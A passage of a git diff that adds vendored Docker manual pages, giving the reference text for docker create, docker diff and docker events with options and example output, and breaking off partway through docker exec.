`/etc/my-app.d` in a container: + + $ docker cp /config/. myappcontainer:/etc/my-app.d + +The above command will copy the contents of the local `/config` directory into +the directory `/etc/my-app.d` in the container. + +Finally, if you want to copy a symbolic link into a container, you typically +want to copy the linked target and not the link itself. To copy the target, use +the `-L` option, for example: + + $ ln -s /tmp/somefile /tmp/somefile.ln + $ docker cp -L /tmp/somefile.ln myappcontainer:/tmp/ + +This command copies content of the local `/tmp/somefile` into the file +`/tmp/somefile.ln` in the container. Without `-L` option, the `/tmp/somefile.ln` +preserves its symbolic link but not its content. + +# HISTORY +April 2014, Originally compiled by William Henry (whenry at redhat dot com) +based on docker.com source material and internal work. +June 2014, updated by Sven Dowideit +May 2015, updated by Josh Hawn diff --git a/vendor/github.com/docker/docker/man/docker-create.1.md b/vendor/github.com/docker/docker/man/docker-create.1.md new file mode 100644 index 0000000000..3f8a076374 --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-create.1.md @@ -0,0 +1,553 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% JUNE 2014 +# NAME +docker-create - Create a new container + +# SYNOPSIS +**docker create** +[**-a**|**--attach**[=*[]*]] +[**--add-host**[=*[]*]] +[**--blkio-weight**[=*[BLKIO-WEIGHT]*]] +[**--blkio-weight-device**[=*[]*]] +[**--cpu-shares**[=*0*]] +[**--cap-add**[=*[]*]] +[**--cap-drop**[=*[]*]] +[**--cgroup-parent**[=*CGROUP-PATH*]] +[**--cidfile**[=*CIDFILE*]] +[**--cpu-count**[=*0*]] +[**--cpu-percent**[=*0*]] +[**--cpu-period**[=*0*]] +[**--cpu-quota**[=*0*]] +[**--cpu-rt-period**[=*0*]] +[**--cpu-rt-runtime**[=*0*]] +[**--cpus**[=*0.0*]] +[**--cpuset-cpus**[=*CPUSET-CPUS*]] +[**--cpuset-mems**[=*CPUSET-MEMS*]] +[**--device**[=*[]*]] +[**--device-read-bps**[=*[]*]] +[**--device-read-iops**[=*[]*]] +[**--device-write-bps**[=*[]*]] +[**--device-write-iops**[=*[]*]] +[**--dns**[=*[]*]] +[**--dns-search**[=*[]*]] +[**--dns-option**[=*[]*]] +[**-e**|**--env**[=*[]*]] +[**--entrypoint**[=*ENTRYPOINT*]] +[**--env-file**[=*[]*]] +[**--expose**[=*[]*]] +[**--group-add**[=*[]*]] +[**-h**|**--hostname**[=*HOSTNAME*]] +[**--help**] +[**-i**|**--interactive**] +[**--ip**[=*IPv4-ADDRESS*]] +[**--ip6**[=*IPv6-ADDRESS*]] +[**--ipc**[=*IPC*]] +[**--isolation**[=*default*]] +[**--kernel-memory**[=*KERNEL-MEMORY*]] +[**-l**|**--label**[=*[]*]] +[**--label-file**[=*[]*]] +[**--link**[=*[]*]] +[**--link-local-ip**[=*[]*]] +[**--log-driver**[=*[]*]] +[**--log-opt**[=*[]*]] +[**-m**|**--memory**[=*MEMORY*]] +[**--mac-address**[=*MAC-ADDRESS*]] +[**--memory-reservation**[=*MEMORY-RESERVATION*]] +[**--memory-swap**[=*LIMIT*]] +[**--memory-swappiness**[=*MEMORY-SWAPPINESS*]] +[**--name**[=*NAME*]] +[**--network-alias**[=*[]*]] +[**--network**[=*"bridge"*]] +[**--oom-kill-disable**] +[**--oom-score-adj**[=*0*]] +[**-P**|**--publish-all**] +[**-p**|**--publish**[=*[]*]] +[**--pid**[=*[PID]*]] +[**--userns**[=*[]*]] +[**--pids-limit**[=*PIDS_LIMIT*]] +[**--privileged**] +[**--read-only**] +[**--restart**[=*RESTART*]] +[**--rm**] +[**--security-opt**[=*[]*]] +[**--storage-opt**[=*[]*]] +[**--stop-signal**[=*SIGNAL*]] +[**--stop-timeout**[=*TIMEOUT*]] +[**--shm-size**[=*[]*]] +[**--sysctl**[=*[]*]] +[**-t**|**--tty**] +[**--tmpfs**[=*[CONTAINER-DIR[:]*]] +[**-u**|**--user**[=*USER*]] +[**--ulimit**[=*[]*]] +[**--uts**[=*[]*]] +[**-v**|**--volume**[=*[[HOST-DIR:]CONTAINER-DIR[:OPTIONS]]*]] +[**--volume-driver**[=*DRIVER*]] +[**--volumes-from**[=*[]*]] +[**-w**|**--workdir**[=*WORKDIR*]] +IMAGE [COMMAND] [ARG...] + +# DESCRIPTION + +Creates a writeable container layer over the specified image and prepares it for +running the specified command. The container ID is then printed to STDOUT. This +is similar to **docker run -d** except the container is never started. You can +then use the **docker start ** command to start the container at +any point. + +The initial status of the container created with **docker create** is 'created'. + +# OPTIONS +**-a**, **--attach**=[] + Attach to STDIN, STDOUT or STDERR. + +**--add-host**=[] + Add a custom host-to-IP mapping (host:ip) + +**--blkio-weight**=*0* + Block IO weight (relative weight) accepts a weight value between 10 and 1000. + +**--blkio-weight-device**=[] + Block IO weight (relative device weight, format: `DEVICE_NAME:WEIGHT`). + +**--cpu-shares**=*0* + CPU shares (relative weight) + +**--cap-add**=[] + Add Linux capabilities + +**--cap-drop**=[] + Drop Linux capabilities + +**--cgroup-parent**="" + Path to cgroups under which the cgroup for the container will be created. If the path is not absolute, the path is considered to be relative to the cgroups path of the init process. Cgroups will be created if they do not already exist. + +**--cidfile**="" + Write the container ID to the file + +**--cpu-count**=*0* + Limit the number of CPUs available for execution by the container. + + On Windows Server containers, this is approximated as a percentage of total CPU usage. + + On Windows Server containers, the processor resource controls are mutually exclusive, the order of precedence is CPUCount first, then CPUShares, and CPUPercent last. + +**--cpu-percent**=*0* + Limit the percentage of CPU available for execution by a container running on a Windows daemon. + + On Windows Server containers, the processor resource controls are mutually exclusive, the order of precedence is CPUCount first, then CPUShares, and CPUPercent last. + +**--cpu-period**=*0* + Limit the CPU CFS (Completely Fair Scheduler) period + + Limit the container's CPU usage. This flag tell the kernel to restrict the container's CPU usage to the period you specify. + +**--cpuset-cpus**="" + CPUs in which to allow execution (0-3, 0,1) + +**--cpuset-mems**="" + Memory nodes (MEMs) in which to allow execution (0-3, 0,1). Only effective on NUMA systems. + + If you have four memory nodes on your system (0-3), use `--cpuset-mems=0,1` +then processes in your Docker container will only use memory from the first +two memory nodes. + +**--cpu-quota**=*0* + Limit the CPU CFS (Completely Fair Scheduler) quota + +**--cpu-rt-period**=0 + Limit the CPU real-time period in microseconds + + Limit the container's Real Time CPU usage. This flag tell the kernel to restrict the container's Real Time CPU usage to the period you specify. + +**--cpu-rt-runtime**=0 + Limit the CPU real-time runtime in microseconds + + Limit the containers Real Time CPU usage. This flag tells the kernel to limit the amount of time in a given CPU period Real Time tasks may consume. Ex: + Period of 1,000,000us and Runtime of 950,000us means that this container could consume 95% of available CPU and leave the remaining 5% to normal priority tasks. + + The sum of all runtimes across containers cannot exceed the amount allotted to the parent cgroup. + +**--cpus**=0.0 + Number of CPUs. The default is *0.0*. + +**--device**=[] + Add a host device to the container (e.g. --device=/dev/sdc:/dev/xvdc:rwm) + +**--device-read-bps**=[] + Limit read rate (bytes per second) from a device (e.g. --device-read-bps=/dev/sda:1mb) + +**--device-read-iops**=[] + Limit read rate (IO per second) from a device (e.g. --device-read-iops=/dev/sda:1000) + +**--device-write-bps**=[] + Limit write rate (bytes per second) to a device (e.g. --device-write-bps=/dev/sda:1mb) + +**--device-write-iops**=[] + Limit write rate (IO per second) to a device (e.g. --device-write-iops=/dev/sda:1000) + +**--dns**=[] + Set custom DNS servers + +**--dns-option**=[] + Set custom DNS options + +**--dns-search**=[] + Set custom DNS search domains (Use --dns-search=. if you don't wish to set the search domain) + +**-e**, **--env**=[] + Set environment variables + +**--entrypoint**="" + Overwrite the default ENTRYPOINT of the image + +**--env-file**=[] + Read in a line-delimited file of environment variables + +**--expose**=[] + Expose a port or a range of ports (e.g. --expose=3300-3310) from the container without publishing it to your host + +**--group-add**=[] + Add additional groups to run as + +**-h**, **--hostname**="" + Container host name + +**--help** + Print usage statement + +**-i**, **--interactive**=*true*|*false* + Keep STDIN open even if not attached. The default is *false*. + +**--ip**="" + Sets the container's interface IPv4 address (e.g. 172.23.0.9) + + It can only be used in conjunction with **--network** for user-defined networks + +**--ip6**="" + Sets the container's interface IPv6 address (e.g. 2001:db8::1b99) + + It can only be used in conjunction with **--network** for user-defined networks + +**--ipc**="" + Default is to create a private IPC namespace (POSIX SysV IPC) for the container + 'container:': reuses another container shared memory, semaphores and message queues + 'host': use the host shared memory,semaphores and message queues inside the container. Note: the host mode gives the container full access to local shared memory and is therefore considered insecure. + +**--isolation**="*default*" + Isolation specifies the type of isolation technology used by containers. Note +that the default on Windows server is `process`, and the default on Windows client +is `hyperv`. Linux only supports `default`. + +**--kernel-memory**="" + Kernel memory limit (format: `[]`, where unit = b, k, m or g) + + Constrains the kernel memory available to a container. If a limit of 0 +is specified (not using `--kernel-memory`), the container's kernel memory +is not limited. If you specify a limit, it may be rounded up to a multiple +of the operating system's page size and the value can be very large, +millions of trillions. + +**-l**, **--label**=[] + Adds metadata to a container (e.g., --label=com.example.key=value) + +**--label-file**=[] + Read labels from a file. Delimit each label with an EOL. + +**--link**=[] + Add link to another container in the form of :alias or just + in which case the alias will match the name. + +**--link-local-ip**=[] + Add one or more link-local IPv4/IPv6 addresses to the container's interface + +**--log-driver**="*json-file*|*syslog*|*journald*|*gelf*|*fluentd*|*awslogs*|*splunk*|*etwlogs*|*gcplogs*|*none*" + Logging driver for the container. Default is defined by daemon `--log-driver` flag. + **Warning**: the `docker logs` command works only for the `json-file` and + `journald` logging drivers. + +**--log-opt**=[] + Logging driver specific options. + +**-m**, **--memory**="" + Memory limit (format: [], where unit = b, k, m or g) + + Allows you to constrain the memory available to a container. If the host +supports swap memory, then the **-m** memory setting can be larger than physical +RAM. If a limit of 0 is specified (not using **-m**), the container's memory is +not limited. The actual limit may be rounded up to a multiple of the operating +system's page size (the value would be very large, that's millions of trillions). + +**--mac-address**="" + Container MAC address (e.g. 92:d0:c6:0a:29:33) + +**--memory-reservation**="" + Memory soft limit (format: [], where unit = b, k, m or g) + + After setting memory reservation, when the system detects memory contention +or low memory, containers are forced to restrict their consumption to their +reservation. So you should always set the value below **--memory**, otherwise the +hard limit will take precedence. By default, memory reservation will be the same +as memory limit. + +**--memory-swap**="LIMIT" + A limit value equal to memory plus swap. Must be used with the **-m** +(**--memory**) flag. The swap `LIMIT` should always be larger than **-m** +(**--memory**) value. + + The format of `LIMIT` is `[]`. Unit can be `b` (bytes), +`k` (kilobytes), `m` (megabytes), or `g` (gigabytes). If you don't specify a +unit, `b` is used. Set LIMIT to `-1` to enable unlimited swap. + +**--memory-swappiness**="" + Tune a container's memory swappiness behavior. Accepts an integer between 0 and 100. + +**--name**="" + Assign a name to the container + +**--network**="*bridge*" + Set the Network mode for the container + 'bridge': create a network stack on the default Docker bridge + 'none': no networking + 'container:': reuse another container's network stack + 'host': use the Docker host network stack. Note: the host mode gives the container full access to local system services such as D-bus and is therefore considered insecure. + '|': connect to a user-defined network + +**--network-alias**=[] + Add network-scoped alias for the container + +**--oom-kill-disable**=*true*|*false* + Whether to disable OOM Killer for the container or not. + +**--oom-score-adj**="" + Tune the host's OOM preferences for containers (accepts -1000 to 1000) + +**-P**, **--publish-all**=*true*|*false* + Publish all exposed ports to random ports on the host interfaces. The default is *false*. + +**-p**, **--publish**=[] + Publish a container's port, or a range of ports, to the host + format: ip:hostPort:containerPort | ip::containerPort | hostPort:containerPort | containerPort + Both hostPort and containerPort can be specified as a range of ports. + When specifying ranges for both, the number of container ports in the range must match the number of host ports in the range. (e.g., `-p 1234-1236:1234-1236/tcp`) + (use 'docker port' to see the actual mapping) + +**--pid**="" + Set the PID mode for the container + Default is to create a private PID namespace for the container + 'container:': join another container's PID namespace + 'host': use the host's PID namespace for the container. Note: the host mode gives the container full access to local PID and is therefore considered insecure. + +**--userns**="" + Set the usernamespace mode for the container when `userns-remap` option is enabled. + **host**: use the host usernamespace and enable all privileged options (e.g., `pid=host` or `--privileged`). + +**--pids-limit**="" + Tune the container's pids limit. Set `-1` to have unlimited pids for the container. + +**--privileged**=*true*|*false* + Give extended privileges to this container. The default is *false*. + +**--read-only**=*true*|*false* + Mount the container's root filesystem as read only. + +**--restart**="*no*" + Restart policy to apply when a container exits (no, on-failure[:max-retry], always, unless-stopped). + +**--rm**=*true*|*false* + Automatically remove the container when it exits. The default is *false*. + +**--shm-size**="" + Size of `/dev/shm`. The format is ``. `number` must be greater than `0`. + Unit is optional and can be `b` (bytes), `k` (kilobytes), `m` (megabytes), or `g` (gigabytes). If you omit the unit, the system uses bytes. + If you omit the size entirely, the system uses `64m`. + +**--security-opt**=[] + Security Options + + "label:user:USER" : Set the label user for the container + "label:role:ROLE" : Set the label role for the container + "label:type:TYPE" : Set the label type for the container + "label:level:LEVEL" : Set the label level for the container + "label:disable" : Turn off label confinement for the container + "no-new-privileges" : Disable container processes from gaining additional privileges + "seccomp:unconfined" : Turn off seccomp confinement for the container + "seccomp:profile.json : White listed syscalls seccomp Json file to be used as a seccomp filter + +**--storage-opt**=[] + Storage driver options per container + + $ docker create -it --storage-opt size=120G fedora /bin/bash + + This (size) will allow to set the container rootfs size to 120G at creation time. + This option is only available for the `devicemapper`, `btrfs`, `overlay2` and `zfs` graph drivers. + For the `devicemapper`, `btrfs` and `zfs` storage drivers, user cannot pass a size less than the Default BaseFS Size. + For the `overlay2` storage driver, the size option is only available if the backing fs is `xfs` and mounted with the `pquota` mount option. + Under these conditions, user can pass any size less then the backing fs size. + +**--stop-signal**=*SIGTERM* + Signal to stop a container. Default is SIGTERM. + +**--stop-timeout**=*10* + Timeout (in seconds) to stop a container. Default is 10. + +**--sysctl**=SYSCTL + Configure namespaced kernel parameters at runtime + + IPC Namespace - current sysctls allowed: + + kernel.msgmax, kernel.msgmnb, kernel.msgmni, kernel.sem, kernel.shmall, kernel.shmmax, kernel.shmmni, kernel.shm_rmid_forced + Sysctls beginning with fs.mqueue.* + + Note: if you use --ipc=host using these sysctls will not be allowed. + + Network Namespace - current sysctls allowed: + Sysctls beginning with net.* + + Note: if you use --network=host using these sysctls will not be allowed. + +**-t**, **--tty**=*true*|*false* + Allocate a pseudo-TTY. The default is *false*. + +**--tmpfs**=[] Create a tmpfs mount + + Mount a temporary filesystem (`tmpfs`) mount into a container, for example: + + $ docker run -d --tmpfs /tmp:rw,size=787448k,mode=1777 my_image + + This command mounts a `tmpfs` at `/tmp` within the container. The supported mount +options are the same as the Linux default `mount` flags. If you do not specify +any options, the systems uses the following options: +`rw,noexec,nosuid,nodev,size=65536k`. + +**-u**, **--user**="" + Sets the username or UID used and optionally the groupname or GID for the specified command. + + The followings examples are all valid: + --user [user | user:group | uid | uid:gid | user:gid | uid:group ] + + Without this argument root user will be used in the container by default. + +**--ulimit**=[] + Ulimit options + +**--uts**=*host* + Set the UTS mode for the container + **host**: use the host's UTS namespace inside the container. + Note: the host mode gives the container access to changing the host's hostname and is therefore considered insecure. + +**-v**|**--volume**[=*[[HOST-DIR:]CONTAINER-DIR[:OPTIONS]]*] + Create a bind mount. If you specify, ` -v /HOST-DIR:/CONTAINER-DIR`, Docker + bind mounts `/HOST-DIR` in the host to `/CONTAINER-DIR` in the Docker + container. If 'HOST-DIR' is omitted, Docker automatically creates the new + volume on the host. The `OPTIONS` are a comma delimited list and can be: + + * [rw|ro] + * [z|Z] + * [`[r]shared`|`[r]slave`|`[r]private`] + +The `CONTAINER-DIR` must be an absolute path such as `/src/docs`. The `HOST-DIR` +can be an absolute path or a `name` value. A `name` value must start with an +alphanumeric character, followed by `a-z0-9`, `_` (underscore), `.` (period) or +`-` (hyphen). An absolute path starts with a `/` (forward slash). + +If you supply a `HOST-DIR` that is an absolute path, Docker bind-mounts to the +path you specify. If you supply a `name`, Docker creates a named volume by that +`name`. For example, you can specify either `/foo` or `foo` for a `HOST-DIR` +value. If you supply the `/foo` value, Docker creates a bind-mount. If you +supply the `foo` specification, Docker creates a named volume. + +You can specify multiple **-v** options to mount one or more mounts to a +container. To use these same mounts in other containers, specify the +**--volumes-from** option also. + +You can add `:ro` or `:rw` suffix to a volume to mount it read-only or +read-write mode, respectively. By default, the volumes are mounted read-write. +See examples. + +Labeling systems like SELinux require that proper labels are placed on volume +content mounted into a container. Without a label, the security system might +prevent the processes running inside the container from using the content. By +default, Docker does not change the labels set by the OS. + +To change a label in the container context, you can add either of two suffixes +`:z` or `:Z` to the volume mount. These suffixes tell Docker to relabel file +objects on the shared volumes. The `z` option tells Docker that two containers +share the volume content. As a result, Docker labels the content with a shared +content label. Shared volume labels allow all containers to read/write content. +The `Z` option tells Docker to label the content with a private unshared label. +Only the current container can use a private volume. + +By default bind mounted volumes are `private`. That means any mounts done +inside container will not be visible on host and vice-a-versa. One can change +this behavior by specifying a volume mount propagation property. Making a +volume `shared` mounts done under that volume inside container will be +visible on host and vice-a-versa. Making a volume `slave` enables only one +way mount propagation and that is mounts done on host under that volume +will be visible inside container but not the other way around. + +To control mount propagation property of volume one can use `:[r]shared`, +`:[r]slave` or `:[r]private` propagation flag. Propagation property can +be specified only for bind mounted volumes and not for internal volumes or +named volumes. For mount propagation to work source mount point (mount point +where source dir is mounted on) has to have right propagation properties. For +shared volumes, source mount point has to be shared. And for slave volumes, +source mount has to be either shared or slave. + +Use `df ` to figure out the source mount and then use +`findmnt -o TARGET,PROPAGATION ` to figure out propagation +properties of source mount. If `findmnt` utility is not available, then one +can look at mount entry for source mount point in `/proc/self/mountinfo`. Look +at `optional fields` and see if any propagaion properties are specified. +`shared:X` means mount is `shared`, `master:X` means mount is `slave` and if +nothing is there that means mount is `private`. + +To change propagation properties of a mount point use `mount` command. For +example, if one wants to bind mount source directory `/foo` one can do +`mount --bind /foo /foo` and `mount --make-private --make-shared /foo`. This +will convert /foo into a `shared` mount point. Alternatively one can directly +change propagation properties of source mount. Say `/` is source mount for +`/foo`, then use `mount --make-shared /` to convert `/` into a `shared` mount. + +> **Note**: +> When using systemd to manage the Docker daemon's start and stop, in the systemd +> unit file there is an option to control mount propagation for the Docker daemon +> itself, called `MountFlags`. The value of this setting may cause Docker to not +> see mount propagation changes made on the mount point. For example, if this value +> is `slave`, you may not be able to use the `shared` or `rshared` propagation on +> a volume. + + +To disable automatic copying of data from the container path to the volume, use +the `nocopy` flag. The `nocopy` flag can be set on bind mounts and named volumes. + +**--volume-driver**="" + Container's volume driver. This driver creates volumes specified either from + a Dockerfile's `VOLUME` instruction or from the `docker run -v` flag. + See **docker-volume-create(1)** for full details. + +**--volumes-from**=[] + Mount volumes from the specified container(s) + +**-w**, **--workdir**="" + Working directory inside the container + +# EXAMPLES + +## Specify isolation technology for container (--isolation) + +This option is useful in situations where you are running Docker containers on +Windows. The `--isolation=` option sets a container's isolation +technology. On Linux, the only supported is the `default` option which uses +Linux namespaces. On Microsoft Windows, you can specify these values: + +* `default`: Use the value specified by the Docker daemon's `--exec-opt` . If the `daemon` does not specify an isolation technology, Microsoft Windows uses `process` as its default value. +* `process`: Namespace isolation only. +* `hyperv`: Hyper-V hypervisor partition-based isolation. + +Specifying the `--isolation` flag without a value is the same as setting `--isolation="default"`. + +# HISTORY +August 2014, updated by Sven Dowideit +September 2014, updated by Sven Dowideit +November 2014, updated by Sven Dowideit diff --git a/vendor/github.com/docker/docker/man/docker-diff.1.md b/vendor/github.com/docker/docker/man/docker-diff.1.md new file mode 100644 index 0000000000..6c6c502533 --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-diff.1.md @@ -0,0 +1,49 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% JUNE 2014 +# NAME +docker-diff - Inspect changes on a container's filesystem + +# SYNOPSIS +**docker diff** +[**--help**] +CONTAINER + +# DESCRIPTION +Inspect changes on a container's filesystem. You can use the full or +shortened container ID or the container name set using +**docker run --name** option. + +# OPTIONS +**--help** + Print usage statement + +# EXAMPLES +Inspect the changes to on a nginx container: + + # docker diff 1fdfd1f54c1b + C /dev + C /dev/console + C /dev/core + C /dev/stdout + C /dev/fd + C /dev/ptmx + C /dev/stderr + C /dev/stdin + C /run + A /run/nginx.pid + C /var/lib/nginx/tmp + A /var/lib/nginx/tmp/client_body + A /var/lib/nginx/tmp/fastcgi + A /var/lib/nginx/tmp/proxy + A /var/lib/nginx/tmp/scgi + A /var/lib/nginx/tmp/uwsgi + C /var/log/nginx + A /var/log/nginx/access.log + A /var/log/nginx/error.log + + +# HISTORY +April 2014, Originally compiled by William Henry (whenry at redhat dot com) +based on docker.com source material and internal work. +June 2014, updated by Sven Dowideit diff --git a/vendor/github.com/docker/docker/man/docker-events.1.md b/vendor/github.com/docker/docker/man/docker-events.1.md new file mode 100644 index 0000000000..51b042775a --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-events.1.md @@ -0,0 +1,180 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% JUNE 2014 +# NAME +docker-events - Get real time events from the server + +# SYNOPSIS +**docker events** +[**--help**] +[**-f**|**--filter**[=*[]*]] +[**--since**[=*SINCE*]] +[**--until**[=*UNTIL*]] +[**--format**[=*FORMAT*]] + + +# DESCRIPTION +Get event information from the Docker daemon. Information can include historical +information and real-time information. + +Docker containers will report the following events: + + attach, commit, copy, create, destroy, detach, die, exec_create, exec_detach, exec_start, export, kill, oom, pause, rename, resize, restart, start, stop, top, unpause, update + +Docker images report the following events: + + delete, import, load, pull, push, save, tag, untag + +Docker volumes report the following events: + + create, mount, unmount, destroy + +Docker networks report the following events: + + create, connect, disconnect, destroy + +# OPTIONS +**--help** + Print usage statement + +**-f**, **--filter**=[] + Filter output based on these conditions + - container (`container=`) + - event (`event=`) + - image (`image=`) + - plugin (experimental) (`plugin=`) + - label (`label=` or `label==`) + - type (`type=`) + - volume (`volume=`) + - network (`network=`) + - daemon (`daemon=`) + +**--since**="" + Show all events created since timestamp + +**--until**="" + Stream events until this timestamp + +**--format**="" + Format the output using the given Go template + +The `--since` and `--until` parameters can be Unix timestamps, date formatted +timestamps, or Go duration strings (e.g. `10m`, `1h30m`) computed +relative to the client machine's time. If you do not provide the `--since` option, +the command returns only new and/or live events. Supported formats for date +formatted time stamps include RFC3339Nano, RFC3339, `2006-01-02T15:04:05`, +`2006-01-02T15:04:05.999999999`, `2006-01-02Z07:00`, and `2006-01-02`. The local +timezone on the client will be used if you do not provide either a `Z` or a +`+-00:00` timezone offset at the end of the timestamp. When providing Unix +timestamps enter seconds[.nanoseconds], where seconds is the number of seconds +that have elapsed since January 1, 1970 (midnight UTC/GMT), not counting leap +seconds (aka Unix epoch or Unix time), and the optional .nanoseconds field is a +fraction of a second no more than nine digits long. + +# EXAMPLES + +## Listening for Docker events + +After running docker events a container 786d698004576 is started and stopped +(The container name has been shortened in the output below): + + # docker events + 2015-01-28T20:21:31.000000000-08:00 59211849bc10: (from whenry/testimage:latest) start + 2015-01-28T20:21:31.000000000-08:00 59211849bc10: (from whenry/testimage:latest) die + 2015-01-28T20:21:32.000000000-08:00 59211849bc10: (from whenry/testimage:latest) stop + +## Listening for events since a given date +Again the output container IDs have been shortened for the purposes of this document: + + # docker events --since '2015-01-28' + 2015-01-28T20:25:38.000000000-08:00 c21f6c22ba27: (from whenry/testimage:latest) create + 2015-01-28T20:25:38.000000000-08:00 c21f6c22ba27: (from whenry/testimage:latest) start + 2015-01-28T20:25:39.000000000-08:00 c21f6c22ba27: (from whenry/testimage:latest) create + 2015-01-28T20:25:39.000000000-08:00 c21f6c22ba27: (from whenry/testimage:latest) start + 2015-01-28T20:25:40.000000000-08:00 c21f6c22ba27: (from whenry/testimage:latest) die + 2015-01-28T20:25:42.000000000-08:00 c21f6c22ba27: (from whenry/testimage:latest) stop + 2015-01-28T20:25:45.000000000-08:00 c21f6c22ba27: (from whenry/testimage:latest) start + 2015-01-28T20:25:45.000000000-08:00 c21f6c22ba27: (from whenry/testimage:latest) die + 2015-01-28T20:25:46.000000000-08:00 c21f6c22ba27: (from whenry/testimage:latest) stop + +The following example outputs all events that were generated in the last 3 minutes, +relative to the current time on the client machine: + + # docker events --since '3m' + 2015-05-12T11:51:30.999999999Z07:00 4386fb97867d: (from ubuntu-1:14.04) die + 2015-05-12T15:52:12.999999999Z07:00 4386fb97867d: (from ubuntu-1:14.04) stop + 2015-05-12T15:53:45.999999999Z07:00 7805c1d35632: (from redis:2.8) die + 2015-05-12T15:54:03.999999999Z07:00 7805c1d35632: (from redis:2.8) stop + +If you do not provide the --since option, the command returns only new and/or +live events. + +## Format + +If a format (`--format`) is specified, the given template will be executed +instead of the default format. Go's **text/template** package describes all the +details of the format. + + # docker events --filter 'type=container' --format 'Type={{.Type}} Status={{.Status}} ID={{.ID}}' + Type=container Status=create ID=2ee349dac409e97974ce8d01b70d250b85e0ba8189299c126a87812311951e26 + Type=container Status=attach ID=2ee349dac409e97974ce8d01b70d250b85e0ba8189299c126a87812311951e26 + Type=container Status=start ID=2ee349dac409e97974ce8d01b70d250b85e0ba8189299c126a87812311951e26 + Type=container Status=resize ID=2ee349dac409e97974ce8d01b70d250b85e0ba8189299c126a87812311951e26 + Type=container Status=die ID=2ee349dac409e97974ce8d01b70d250b85e0ba8189299c126a87812311951e26 + Type=container Status=destroy ID=2ee349dac409e97974ce8d01b70d250b85e0ba8189299c126a87812311951e26 + +If a format is set to `{{json .}}`, the events are streamed as valid JSON +Lines. For information about JSON Lines, please refer to http://jsonlines.org/ . + + # docker events --format '{{json .}}' + {"status":"create","id":"196016a57679bf42424484918746a9474cd905dd993c4d0f4.. + {"status":"attach","id":"196016a57679bf42424484918746a9474cd905dd993c4d0f4.. + {"Type":"network","Action":"connect","Actor":{"ID":"1b50a5bf755f6021dfa78e.. + {"status":"start","id":"196016a57679bf42424484918746a9474cd905dd993c4d0f42.. + {"status":"resize","id":"196016a57679bf42424484918746a9474cd905dd993c4d0f4.. + +## Filters + + $ docker events --filter 'event=stop' + 2014-05-10T17:42:14.999999999Z07:00 container stop 4386fb97867d (image=ubuntu-1:14.04) + 2014-09-03T17:42:14.999999999Z07:00 container stop 7805c1d35632 (image=redis:2.8) + + $ docker events --filter 'image=ubuntu-1:14.04' + 2014-05-10T17:42:14.999999999Z07:00 container start 4386fb97867d (image=ubuntu-1:14.04) + 2014-05-10T17:42:14.999999999Z07:00 container die 4386fb97867d (image=ubuntu-1:14.04) + 2014-05-10T17:42:14.999999999Z07:00 container stop 4386fb97867d (image=ubuntu-1:14.04) + + $ docker events --filter 'container=7805c1d35632' + 2014-05-10T17:42:14.999999999Z07:00 container die 7805c1d35632 (image=redis:2.8) + 2014-09-03T15:49:29.999999999Z07:00 container stop 7805c1d35632 (image= redis:2.8) + + $ docker events --filter 'container=7805c1d35632' --filter 'container=4386fb97867d' + 2014-09-03T15:49:29.999999999Z07:00 container die 4386fb97867d (image=ubuntu-1:14.04) + 2014-05-10T17:42:14.999999999Z07:00 container stop 4386fb97867d (image=ubuntu-1:14.04) + 2014-05-10T17:42:14.999999999Z07:00 container die 7805c1d35632 (image=redis:2.8) + 2014-09-03T15:49:29.999999999Z07:00 container stop 7805c1d35632 (image=redis:2.8) + + $ docker events --filter 'container=7805c1d35632' --filter 'event=stop' + 2014-09-03T15:49:29.999999999Z07:00 container stop 7805c1d35632 (image=redis:2.8) + + $ docker events --filter 'type=volume' + 2015-12-23T21:05:28.136212689Z volume create test-event-volume-local (driver=local) + 2015-12-23T21:05:28.383462717Z volume mount test-event-volume-local (read/write=true, container=562fe10671e9273da25eed36cdce26159085ac7ee6707105fd534866340a5025, destination=/foo, driver=local, propagation=rprivate) + 2015-12-23T21:05:28.650314265Z volume unmount test-event-volume-local (container=562fe10671e9273da25eed36cdce26159085ac7ee6707105fd534866340a5025, driver=local) + 2015-12-23T21:05:28.716218405Z volume destroy test-event-volume-local (driver=local) + + $ docker events --filter 'type=network' + 2015-12-23T21:38:24.705709133Z network create 8b111217944ba0ba844a65b13efcd57dc494932ee2527577758f939315ba2c5b (name=test-event-network-local, type=bridge) + 2015-12-23T21:38:25.119625123Z network connect 8b111217944ba0ba844a65b13efcd57dc494932ee2527577758f939315ba2c5b (name=test-event-network-local, container=b4be644031a3d90b400f88ab3d4bdf4dc23adb250e696b6328b85441abe2c54e, type=bridge) + + $ docker events --filter 'type=plugin' (experimental) + 2016-07-25T17:30:14.825557616Z plugin pull ec7b87f2ce84330fe076e666f17dfc049d2d7ae0b8190763de94e1f2d105993f (name=tiborvass/sample-volume-plugin:latest) + 2016-07-25T17:30:14.888127370Z plugin enable ec7b87f2ce84330fe076e666f17dfc049d2d7ae0b8190763de94e1f2d105993f (name=tiborvass/sample-volume-plugin:latest) + + +# HISTORY +April 2014, Originally compiled by William Henry (whenry at redhat dot com) +based on docker.com source material and internal work. +June 2014, updated by Sven Dowideit +June 2015, updated by Brian Goff +October 2015, updated by Mike Brown diff --git a/vendor/github.com/docker/docker/man/docker-exec.1.md b/vendor/github.com/docker/docker/man/docker-exec.1.md new file mode 100644 index 0000000000..fe9c279e7e --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker-exec.1.md @@ -0,0 +1,71 @@ +% DOCKER(1) Docker User Manuals +% Docker Community +% JUNE 2014 +# NAME +docker-exec - Run a command in a running container + +# SYNOPSIS +**docker exec** +[**-d**|**--detach**] +[**--detach-keys**[=*[]*]] +[**-e**|**--env**[=*[]*]] +[**--help**] +[**-i**|**--interactive**] +[**--privileged**] +[**-t**|**--tty**] +[**-u**|**--user**[=*USER*]] +CONTAINER COMMAND [ARG...] + +# DESCRIPTION + +Run a process in a running container. + +The command started using `docker exec` will only run while the container's primary +process (`PID 1`) is running, and will not be restarted if the container is restarted. + +If the container is paused, then the `docker exec` command will wait until the +container is unpaused, and then run + +# OPTIONS +**-d**, **--detach**=*true*|*false* + Detached mode: run command in the background. The default is *false*. + +**--detach-keys**="" + Override the key sequence for detaching a container. Format is a single character `[a-Z]` or `ctrl-` where `` is one of: `a-z`, `@`, `^`, `[`, `,` or `_`. + +**-e**, **--env**=[] + Set environment variables + + 